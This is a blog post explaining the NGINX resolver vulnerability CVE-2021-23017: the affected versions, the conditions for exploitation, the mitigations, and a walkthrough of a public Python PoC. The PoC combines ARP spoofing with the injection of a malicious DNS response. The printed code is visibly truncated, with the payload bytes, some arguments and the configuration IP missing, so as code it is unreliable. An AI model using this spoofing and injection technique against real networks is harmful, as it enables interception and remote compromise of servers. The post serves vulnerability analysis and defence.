Is CVE-2021-23017 remotely exploitable? - ScienceChronicle
May 20, 2024

Is CVE-2021-23017 remotely exploitable?

Posted on May 20, 2024  •  7 minutes  • 1349 words
Table of contents

CVE-2021-23017 is a critical vulnerability in the NGINX resolver that can lead to a buffer overflow, allowing for potential remote code execution (RCE). This vulnerability affects NGINX when it is configured to use a resolver with DNS server responses.

Conditions for CVE-2021-23017

  1. NGINX Version:

    • The vulnerability affects NGINX versions 0.6.18 through 1.20.0.
  2. NGINX Configuration:

    • NGINX must be configured to use the resolver directive. This directive specifies the IP address of the DNS server that NGINX should use to resolve domain names.
    • The resolver directive is typically used in configurations for DNS-based service discovery, dynamic upstreams, or when using NGINX with server names that require DNS resolution.
  3. DNS Response Handling:

    • The vulnerability is triggered by specially crafted DNS responses. An attacker could exploit this vulnerability by sending a malicious DNS response to NGINX, causing a buffer overflow and potentially allowing arbitrary code execution.
  4. Network Exposure:

    • The attacker needs to have the ability to control or spoof DNS responses sent to the NGINX server. This might require being on the same network or having the ability to perform a DNS spoofing attack.

Example Configuration

A vulnerable configuration might look like this:

http {
    resolver;  # Public DNS server (Cloudflare)

    server {
        listen 80;
        location / {

In this example, NGINX is configured to use Cloudflare’s public DNS server ( for DNS resolution. If an attacker can send a malicious DNS response, they could exploit CVE-2021-23017.

Mitigation and Fixes

  1. Upgrade NGINX:

    • Upgrade to NGINX version 1.21.0 or later, where the vulnerability has been fixed.
  2. Configure DNS Security:

    • Ensure that your DNS infrastructure is secure and that DNS responses are coming from trusted sources.
    • Implement DNS security measures such as DNSSEC to help protect against DNS spoofing attacks.
  3. Minimize Use of Resolver Directive:

    • Only use the resolver directive when absolutely necessary. Avoid using it in configurations where it is not needed.
  4. Monitor and Patch Regularly:

    • Regularly monitor your systems for vulnerabilities and apply security patches promptly.

Understanding POC

POC is availabale here .

Overview of the PoC

The PoC aims to exploit a buffer overflow vulnerability in the NGINX resolver. The script performs an ARP spoofing attack to intercept DNS requests from the target and then sends a malicious DNS response to exploit the vulnerability.

Breakdown of the Code

Imports and Setup

from scapy.all import *
from multiprocessing import Process
from binascii import hexlify, unhexlify
import argparse, time, os

Device Setup

def device_setup():
    os.system("echo '1' >> /proc/sys/net/ipv4/ip_forward")
    os.system("iptables -A FORWARD -p UDP --dport 53 -j DROP")

ARP Spoofing

def ARPP(target, dns_server):
    print("[*] Sending poisoned ARP packets")
    target_mac = getmacbyip(target)
    dns_server_mac = getmacbyip(dns_server)
    while True:
        send(ARP(op=2, pdst=target, psrc=dns_server, hwdst=target_mac),verbose = 0)
        send(ARP(op=2, pdst=dns_server, psrc=target, hwdst=dns_server_mac),verbose = 0)

DNS Exploit Listener

def exploit(target):
    print("[*] Listening ")
    sniff(filter="udp and port 53 and host " + target, prn=process_received_packet)

Processing Received Packets

def process_received_packet(received_packet):
    if received_packet[IP].src == target_ip:
        if received_packet.haslayer(DNS):
            if DNSQR in received_packet:
                print("[*] the received packet: " + str(bytes_hex(received_packet)))
                print("[*] the received DNS request: " + str(bytes_hex(received_packet[DNS].build())))
                    dns_request = received_packet[DNS].build()
                    null_pointer_index = bytes(received_packet[DNS].build()).find(0x00,12)
                    print("[*] debug: dns_request[:null_pointer_index] : "+str(hexlify(dns_request[:null_pointer_index])))
                    print("[*] debug: dns_request[null_pointer_index:] : "+str(hexlify(dns_request[null_pointer_index:])))
                    payload = [
                    payload = b"".join(payload)
                    spoofed_pkt = (Ether()/IP(dst=received_packet[IP].src, src=received_packet[IP].dst)/\
                        UDP(dport=received_packet[UDP].sport, sport=received_packet[UDP].dport)/\
                    print("[+] dns answer: "+str(hexlify(payload)))
                    print("[+] full packet: " + str(bytes_hex(spoofed_pkt)))

                    sendp(spoofed_pkt, count=1)
                    print("\n[+] malicious answer was sent")
                    print("[+] exploited\n")
                    print("\n[-] ERROR")

Main Function

def main():
    global target_ip
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", help="IP address of the target")
    parser.add_argument("-r", "--dns_server", help="IP address of the DNS server used by the target")
    args = parser.parse_args()
    target_ip =
    dns_server_ip = args.dns_server
    processes_list = []
    ARPPProcess = Process(target=ARPP,args=(target_ip,dns_server_ip))
    exploitProcess = Process(target=exploit,args=(target_ip,))
    for process in processes_list:
    for process in processes_list:

if __name__ == '__main__':
    target_ip = ""


This PoC script performs an ARP spoofing attack to intercept DNS traffic from a target machine and sends a malicious DNS response to exploit CVE-2021-23017 in NGINX. The malicious response is designed to trigger a buffer overflow, potentially allowing remote code execution. The script requires setting up the environment, parsing command-line arguments, and running two concurrent processes for ARP spoofing and DNS exploitation.

Network Conditions for the Attack

The provided PoC script can be used for a remote attack but requires the attacker to be on the same local network as the target machine.

  1. Local Network Access:

    • The script relies on ARP spoofing (also known as ARP poisoning), which is a type of attack that manipulates the ARP cache of devices on a local network. This means the attacker must be on the same local network as the target machine and the DNS server that the target uses.
  2. DNS Spoofing:

    • The script listens for DNS requests from the target machine and sends a malicious DNS response to exploit the vulnerability. This kind of interception and injection is feasible if the attacker can control or influence the DNS traffic, which typically requires being on the same local network.

Summary of Attack Steps

  1. ARP Spoofing:

    • The attacker sends ARP packets to the target machine and the DNS server, tricking them into associating the attacker’s MAC address with the other’s IP address. This allows the attacker to intercept and modify the DNS traffic between the target and the DNS server.
  2. DNS Spoofing and Exploitation:

    • Once the attacker is in the middle of the DNS communication, they listen for DNS requests from the target machine.
    • When a DNS request is detected, the attacker crafts and sends a malicious DNS response designed to exploit CVE-2021-23017 in NGINX, potentially causing a buffer overflow and enabling remote code execution.

Remote Attack Considerations



The provided PoC script is designed for use in a local network environment where the attacker has the ability to perform ARP spoofing and intercept DNS traffic. It is not suitable for a purely remote attack over the internet without local network access. However, once an attacker has gained access to the local network, they can use this script to exploit vulnerable NGINX instances on that network.




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